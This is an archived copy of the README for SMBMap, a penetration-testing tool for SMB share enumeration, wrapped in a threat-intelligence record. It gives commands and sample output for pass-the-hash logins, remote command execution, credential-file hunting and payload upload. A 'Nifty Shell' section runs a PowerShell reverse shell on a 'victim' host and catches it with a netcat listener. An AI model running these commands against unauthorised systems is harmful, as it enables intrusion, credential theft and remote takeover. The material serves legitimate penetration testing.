{
	"id": "f86f070a-b168-4f2a-ba10-08eb0cd34252",
	"created_at": "2026-04-06T00:18:35.024688Z",
	"updated_at": "2026-04-10T13:11:29.821185Z",
	"deleted_at": null,
	"sha1_hash": "7e9a09d8b849ee21d8194999ff1cbbac8cc4f9d7",
	"title": "GitHub - ShawnDEvans/smbmap: SMBMap is a handy SMB enumeration tool",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 91454,
	"plain_text": "GitHub - ShawnDEvans/smbmap: SMBMap is a handy SMB\r\nenumeration tool\r\nBy NopSec-Sevans\r\nArchived: 2026-04-05 19:46:36 UTC\r\nSMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive\r\npermissions, share contents, upload/download functionality, file name auto-download pattern matching, and even\r\nexecute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching\r\nfor potentially sensitive data across large networks.\r\nSome of the features have not been thoroughly tested, so changes will be forth coming as bugs are found. I only\r\nreally find and fix the bugs while I'm on engagements, so progress is a bit slow. Any feedback or bug reports\r\nwould be appreciated.\r\nNote SMBMap has been updated to Python3!\r\nInstallation\r\n$ sudo pip3 install smbmap\r\n$ smbmap\r\nsmbmap\r\nusage: smbmap [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d\r\n [-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [-x COMMAND] [--mode\r\n [-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check]\r\n [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH]\r\n [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE\r\n...\r\nFeatures:\r\nPass-the-Hash Support\r\nFile upload/download/delete\r\nPermission enumeration (writable share, meet Metasploit)\r\nRemote Command Execution\r\nDistrubted file content searching (beta!)\r\nFile name matching (with an auto downoad capability)\r\nHost file parser supports IPs, host names, and CIDR\r\nSMB sigining detection\r\nServer version output\r\nKerberos support! (super beta)\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 1 of 10\n\nHelp\r\nusage: smbmap.py [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-k] [--no-pass] [--d\r\n [--timeout SCAN_TIMEOUT] [-x COMMAND] [--mode CMDMODE] [-L | -r [PATH]] [-g FILE | --csv FILE]\r\n [--search-path PATH] [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete\r\n ________ ___ ___ _______ ___ ___ __ _______\r\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\r\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\r\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\r\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\r\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\r\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\r\n-----------------------------------------------------------------------------\r\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\r\n https://github.com/ShawnDEvans/smbmap\r\noptions:\r\n -h, --help show this help message and exit\r\nMain arguments:\r\n -H HOST IP or FQDN\r\n --host-file FILE File containing a list of hosts\r\n -u USERNAME, --username USERNAME\r\n Username, if omitted null session assumed\r\n -p PASSWORD, --password PASSWORD\r\n Password or NTLM hash, format is LMHASH:NTHASH\r\n --prompt Prompt for a password\r\n -s SHARE Specify a share (default C$), ex 'C$'\r\n -d DOMAIN Domain name (default WORKGROUP)\r\n -P PORT SMB port (default 445)\r\n -v, --version Return the OS version of the remote host\r\n --signing Check if host has SMB signing disabled, enabled, or required\r\n --admin Just report if the user is an admin\r\n --no-banner Removes the banner from the top of the output\r\n --no-color Removes the color from output\r\n --no-update Removes the \"Working on it\" message\r\n --timeout SCAN_TIMEOUT\r\n Set port scan socket timeout. Default is .5 seconds\r\nKerberos settings:\r\n -k, --kerberos Use Kerberos authentication\r\n --no-pass Use CCache file (export KRB5CCNAME='~/current.ccache')\r\n --dc-ip IP or Host IP or FQDN of DC\r\nCommand Execution:\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 2 of 10\n\nOptions for executing commands on the specified host\r\n -x COMMAND Execute a command ex. 'ipconfig /all'\r\n --mode CMDMODE Set the execution method, wmi or psexec, default wmi\r\nShard drive Search:\r\n Options for searching/enumerating the share of the specified host(s)\r\n -L List all drives on the specified host, requires ADMIN rights.\r\n -r [PATH] Recursively list dirs and files (no share\\path lists the root of ALL shares), ex. 'email\r\n -g FILE Output to a file in a grep friendly format, used with -r (otherwise it outputs nothing),\r\n --csv FILE Output to a CSV file, ex --csv shares.csv\r\n --dir-only List only directories, ommit files.\r\n --no-write-check Skip check to see if drive grants WRITE access.\r\n -q Quiet verbose output. Only shows shares you have READ or WRITE on, and suppresses file l\r\n --depth DEPTH Traverse a directory tree to a specific depth. Default is 1 (root node).\r\n --exclude SHARE [SHARE ...]\r\n Exclude share(s) from searching and listing, ex. --exclude ADMIN$ C$'\r\n -A PATTERN Define a file name pattern (regex) that auto downloads a file on a match (requires -r),\r\nFile Content Search:\r\n Options for searching the content of files (must run as root), kind of experimental\r\n -F PATTERN File content search, -F '[Pp]assword' (requires admin access to execute commands, and Po\r\n --search-path PATH Specify drive/path to search (used with -F, default C:\\Users), ex 'D:\\HR\\'\r\n --search-timeout TIMEOUT\r\n Specifcy a timeout (in seconds) before the file search job gets killed. Default is 300 s\r\nFilesystem interaction:\r\n Options for interacting with the specified host's filesystem\r\n --download PATH Download a file from the remote system, ex.'C$\\temp\\passwords.txt'\r\n --upload SRC DST Upload a file to the remote system ex. '/tmp/payload.exe C$\\temp\\payload.exe'\r\n --delete PATH TO FILE\r\n Delete a remote file, ex. 'C$\\temp\\msf.exe'\r\n --skip Skip delete file confirmation prompt\r\nExamples:\r\n$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1\r\n$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.\r\n$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -Hh 10.1.3.30 -x 'net group \"Domain Admins\" /domain'\r\nDefault Output:\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 3 of 10\n\n$ ./smbmap.py -H 192.168.86.214 -u Administrator -p asdf1234\r\n ________ ___ ___ _______ ___ ___ __ _______\r\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\r\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\r\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\r\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\r\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\r\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\r\n -----------------------------------------------------------------------------\r\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\r\n https://github.com/ShawnDEvans/smbmap\r\n[*] Detected 1 hosts serving SMB\r\n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\r\n \r\n[+] IP: 192.168.86.214:445 Name: shawnevans-pc.lan Status: ADMIN!!!\r\nDisk Permissions Comment\r\n---- ----------- -------\r\nADMIN$ READ, WRITE Remote Admin\r\nC$ READ, WRITE Default share\r\nIPC$ NO ACCESS Remote IPC\r\nMS Publisher Color Printer NO ACCESS MS Publisher Color Printer\r\nprint$ READ, WRITE Printer Drivers\r\nTemp READ, WRITE\r\nUsers READ, WRITE\r\nCommand execution:\r\n$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group \"Domain Admins\" /domain' -H 192.168.2.50\r\n[+] Finding open SMB ports....\r\n[+] User SMB session established...\r\n[+] IP: 192.168.2.50:445 Name: unknown\r\nGroup name Domain Admins\r\nComment Designated administrators of the domain\r\nMembers\r\n-------------------------------------------------------------------------------\r\nabcadmin\r\nThe command completed successfully.\r\nNon recursive path listing (ls):\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 4 of 10\n\n$ ./smbmap.py -H 192.168.86.214 -u Administrator -p asdf1234 -r c$ -q\r\n ________ ___ ___ _______ ___ ___ __ _______\r\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\r\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\r\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\r\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\r\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\r\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\r\n -----------------------------------------------------------------------------\r\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\r\n https://github.com/ShawnDEvans/smbmap\r\n[*] Detected 1 hosts serving SMB\r\n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\r\n \r\n[+] IP: 192.168.86.214:445 Name: shawnevans-pc.lan Status: ADMIN!!!\r\nDisk Permissions Comment\r\n---- ----------- -------\r\nADMIN$ READ, WRITE Remote Admin\r\nC$ READ, WRITE Default share\r\n./C$\r\ndr--r--r-- 0 Wed Apr 22 14:50:29 2015 $Recycle.Bin\r\nfr--r--r-- 4284 Wed Oct 3 10:16:24 2018 ActivityLog.xsl\r\ndr--r--r-- 0 Tue Nov 21 10:47:06 2023 Config.Msi\r\ndr--r--r-- 0 Thu Apr 9 14:46:57 2015 Documents and Settings\r\ndr--r--r-- 0 Mon Feb 15 16:45:44 2021 iDEFENSE\r\ndr--r--r-- 0 Thu Sep 24 20:52:23 2015 nasm\r\nfr--r--r-- 2513149952 Tue Nov 21 13:21:16 2023 pagefile.sys\r\ndr--r--r-- 0 Thu Apr 9 14:46:48 2015 PerfLogs\r\ndw--w--w-- 0 Mon Oct 30 09:20:53 2023 Program Files\r\ndw--w--w-- 0 Fri Nov 17 03:27:46 2023 Program Files (x86)\r\ndr--r--r-- 0 Wed Jun 14 13:39:51 2023 ProgramData\r\ndr--r--r-- 0 Mon Oct 1 12:05:49 2018 Python27\r\ndr--r--r-- 0 Thu Apr 9 13:49:31 2015 Recovery\r\ndr--r--r-- 0 Thu Oct 15 13:04:27 2015 Scripts\r\ndr--r--r-- 0 Tue Nov 21 11:13:24 2023 System Volume Information\r\nfr--r--r-- 5194752 Mon Jan 18 11:12:13 2016 System.Management.Automation.dll\r\nfr--r--r-- 0 Fri May 19 13:51:42 2023 TBIWYRVUOD.txt\r\ndr--r--r-- 0 Thu Nov 23 13:04:51 2023 Temp\r\nfr--r--r-- 15812 Wed Oct 3 10:16:45 2018 temp.log\r\nfr--r--r-- 18 Thu Feb 13 15:55:55 2020 test.txt\r\ndr--r--r-- 0 Wed Jun 21 12:43:46 2023 Tools\r\ndw--w--w-- 0 Thu Nov 23 13:04:51 2023 Users\r\ndr--r--r-- 0 Thu Nov 23 13:04:51 2023 Windows\r\nprint$ READ, WRITE Printer Drivers\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 5 of 10\n\nTemp READ, WRITE\r\nUsers READ, WRITE\r\nRecursive listing\r\n$ ./smbmap.py -H 192.168.86.179 -u Administrator -p asdf1234 -r Tools --depth 2 --no-banner -q\r\n[*] Detected 1 hosts serving SMB\r\n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\r\n \r\n[+] IP: 192.168.86.179:445 Name: desktop-m8n2dcc.lan Status: ADMIN!!!\r\nDisk Permissions Comment\r\n---- ----------- -------\r\nADMIN$ READ, WRITE Remote Admin\r\nC READ ONLY\r\nC$ READ, WRITE Default share\r\nIPC$ READ ONLY Remote IPC\r\nTools READ, WRITE\r\n./Tools\r\ndr--r--r-- 0 Fri Nov 24 08:51:45 2023 .\r\ndr--r--r-- 0 Fri Nov 24 08:51:45 2023 ..\r\nfr--r--r-- 0 Fri May 19 13:39:58 2023 AZNJSOWDQU\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 CVE-2020-0688_EXP\r\nfr--r--r-- 13821 Mon May 15 15:34:30 2023 Debug.txt\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 diskmon\r\nfr--r--r-- 13821 Mon May 15 15:34:30 2023 Errors.txt\r\nfr--r--r-- 0 Fri May 19 13:42:42 2023 GNDBLUQZMA.txt\r\nfr--r--r-- 0 Fri May 19 13:40:56 2023 HOQVWGAXEG\r\nfr--r--r-- 2833 Mon May 15 15:34:30 2023 kiwi_passwords.yar\r\nfr--r--r-- 2850 Mon May 15 15:34:30 2023 mimicom.idl\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 portmon\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 procexplorer\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 ProcMon\r\nfr--r--r-- 4951 Mon May 15 15:34:30 2023 README.md\r\nfr--r--r-- 4605 Mon May 15 15:34:30 2023 README.txt\r\nfr--r--r-- 0 Fri May 19 13:37:17 2023 RZFNUHSYET\r\nfr--r--r-- 123515 Mon May 15 15:34:30 2023 SharePoint - URL Extensions - 18MAR2012.pdf\r\nfr--r--r-- 2810 Mon May 15 15:34:30 2023 SharePoint-UrlExtensions-18Mar2012.txt\r\nfr--r--r-- 3028050 Mon May 15 15:34:30 2023 SharePointURLBrute v1.1.exe\r\nfr--r--r-- 8423 Mon May 15 15:34:30 2023 SharePointURLBrute v1.1.pl\r\nfr--r--r-- 116 Mon May 15 15:34:30 2023 UrlsFound.txt\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 Win32\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 x64\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 ysoserial\r\n./Tools//CVE-2020-0688_EXP\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 .\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 ..\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 6 of 10\n\ndr--r--r-- 0 Mon May 15 15:34:30 2023 .git\r\nfr--r--r-- 4756 Mon May 15 15:34:30 2023 CVE-2020-0688_EXP.py\r\nfr--r--r-- 0 Mon May 15 15:34:30 2023 nopsec.test'\r\nfr--r--r-- 2169 Mon May 15 15:34:30 2023 README.md\r\ndr--r--r-- 0 Mon May 15 15:34:30 2023 ysoserial-1.32\r\nRecursive Filename Pattern Search\r\n$ ./smbmap.py -H 192.168.86.179 -u Administrator -p asdf1234 -r 'c$/program files' --depth 2 -A '(password|conf\r\n ________ ___ ___ _______ ___ ___ __ _______\r\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\r\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\r\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\r\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\r\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\r\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\r\n -----------------------------------------------------------------------------\r\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\r\n https://github.com/ShawnDEvans/smbmap\r\n[*] Detected 1 hosts serving SMB\r\n[*] Established 1 SMB connections(s) and 1 authentidated session(s)\r\n[*] Performing file name pattern match!.\r\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.C\r\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configur\r\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc\r\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.C\r\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configur\r\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc\r\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.C\r\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Configur\r\n[+] File output to: /home/shawnevans/tools/smbmap/smbmap/192.168.86.179-C_program files_Amazon Web Services, Inc\r\n[+] Match found! Downloading: C$/program files/Amazon Web Services, Inc/Amazon WorkSpaces/Microsoft.Extensions.L\r\n[+] Starting download: C$\\program files\\Amazon Web Services, Inc\\Amazon WorkSpaces\\Microsoft.Extensions.Logging.\r\nScan for SMB signing support\r\n$ ./smbmap.py --host-file local.txt --signing\r\n ________ ___ ___ _______ ___ ___ __ _______\r\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\r\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 7 of 10\n\n\\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\r\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\r\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\r\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\r\n -----------------------------------------------------------------------------\r\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\r\n https://github.com/ShawnDEvans/smbmap\r\n[*] Detected 3 hosts serving SMB\r\n[*] Established 3 SMB connections(s) and 2 authentidated session(s)\r\n[-] 192.168.86.204 signing enabled (not required)\r\n[!] 192.168.86.213 signing disabled\r\n[+] 192.168.86.179 signing required\r\nGet version info\r\n$ ./smbmap.py --host-file local.txt -v\r\n ________ ___ ___ _______ ___ ___ __ _______\r\n /\" )|\" \\ /\" || _ \"\\ |\" \\ /\" | /\"\"\\ | __ \"\\\r\n (: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)\r\n \\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/\r\n __/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /\r\n /\" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\\r\n (_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)\r\n -----------------------------------------------------------------------------\r\n SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\r\n https://github.com/ShawnDEvans/smbmap\r\n[*] Detected 3 hosts serving SMB\r\n[*] Established 3 SMB connections(s) and 2 authentidated session(s)\r\n[+] 192.168.86.204 is running Windows 6.1 Build 7601 (name:SHAWNEVANS-PC) (domain:SHAWNEVANS-PC)\r\n[+] 192.168.86.213 is running Windows 6.1 Build 7601 (name:SHAWNEVANS-PC) (domain:SHAWNEVANS-PC)\r\n[+] 192.168.86.179 is running Windows 10.0 Build 19041 (name:DESKTOP-M8N2DCC) (domain:DESKTOP-M8N2DCC)\r\nFile Content Searching:\r\n$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F\r\n[+] Finding open SMB ports....\r\n[+] User SMB session established on 192.168.0.99...\r\n[+] User SMB session established on 192.168.0.85...\r\n[+] User SMB session established on 192.168.0.89...\r\n[+] File search started on 1 hosts...this could take a while\r\n[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\\Temp\\4650e5a97b9f4ca884613\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 8 of 10\n\n[+] File search started on 2 hosts...this could take a while\r\n[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\\Windows\\TEMP\\e0c822a802eb4\r\n[+] File search started on 3 hosts...this could take a while\r\n[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\\Temp\\0a5d352bf2bd4e288e0f8\r\n[+] Grabbing search results, be patient, share drives tend to be big...\r\n[+] Job 1 of 3 completed on 192.168.0.85...\r\n[+] File successfully deleted: C$\\Windows\\TEMP\\e0c822a802eb455f96259f33.txt\r\n[+] Job 2 of 3 completed on 192.168.0.89...\r\n[+] File successfully deleted: C$\\Temp\\0a5d352bf2bd4e288e0f8f36.txt\r\n[+] Job 3 of 3 completed on 192.168.0.99...\r\n[+] File successfully deleted: C$\\Temp\\4650e5a97b9f4ca884613f4b.txt\r\n[+] All jobs complete\r\nHost: 192.168.0.85 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\r\nNo matching patterns found\r\nHost: 192.168.0.89 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\r\nC:\\Users\\terdf\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\JY5MGKVO\\salesmaps[1].htm\r\nC:\\Users\\terdf\\OldFiles\\Cache_2013522\\Content.IE5\\JY5MGKVO\\salesmaps[1].htm\r\nHost: 192.168.0.99 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]\r\nC:\\Users\\biffh\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\L7W17OPZ\\static.olark[1].xml\r\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\MIY2POGJ\\validation[2].js\r\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\NV1MNBWA\\Docs[1].htm\r\nC:\\Users\\biffh\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\NV1MNBWA\\Salesmaps[1].htm\r\nDrive Listing:\r\nThis feature was added to complement the file content searching feature\r\n$ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L\r\n[!] Missing domain...defaulting to WORKGROUP\r\n[+] Finding open SMB ports....\r\n[+] User SMB session established...\r\n[+] IP: 192.168.1.24:445 Name: unknown\r\n[+] Host 192.168.1.24 Local Drives: C:\\ D:\\\r\n[+] Host 192.168.1.24 Net Drive(s):\r\n E: \\\\vboxsrv\\Public VirtualBox Shared Folders\r\nNifty Shell:\r\nRun Powershell Script on Victim SMB host (change the IP in the code to your IP addres, i.e where the shell\r\nconnects back to)\r\n$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command \"function Revers\r\n[+] Finding open SMB ports....\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 9 of 10\n\n[+] User SMB session established...\r\n[+] IP: 192.168.2.50:445 Name: unkown\r\n[!] Error encountered, sharing violation, unable to retrieve output\r\nAttackers Netcat Listener:\r\n$ nc -l 4445\r\nMicrosoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\r\nC:\\Windows\\system32\u003ewhoami\r\n nt authority\\system\r\nSource: https://github.com/ShawnDEvans/smbmap\r\nhttps://github.com/ShawnDEvans/smbmap\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/ShawnDEvans/smbmap"
	],
	"report_names": [
		"smbmap"
	],
	"threat_actors": [],
	"ts_created_at": 1775434715,
	"ts_updated_at": 1775826689,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7e9a09d8b849ee21d8194999ff1cbbac8cc4f9d7.pdf",
		"text": "https://archive.orkl.eu/7e9a09d8b849ee21d8194999ff1cbbac8cc4f9d7.txt",
		"img": "https://archive.orkl.eu/7e9a09d8b849ee21d8194999ff1cbbac8cc4f9d7.jpg"
	}
}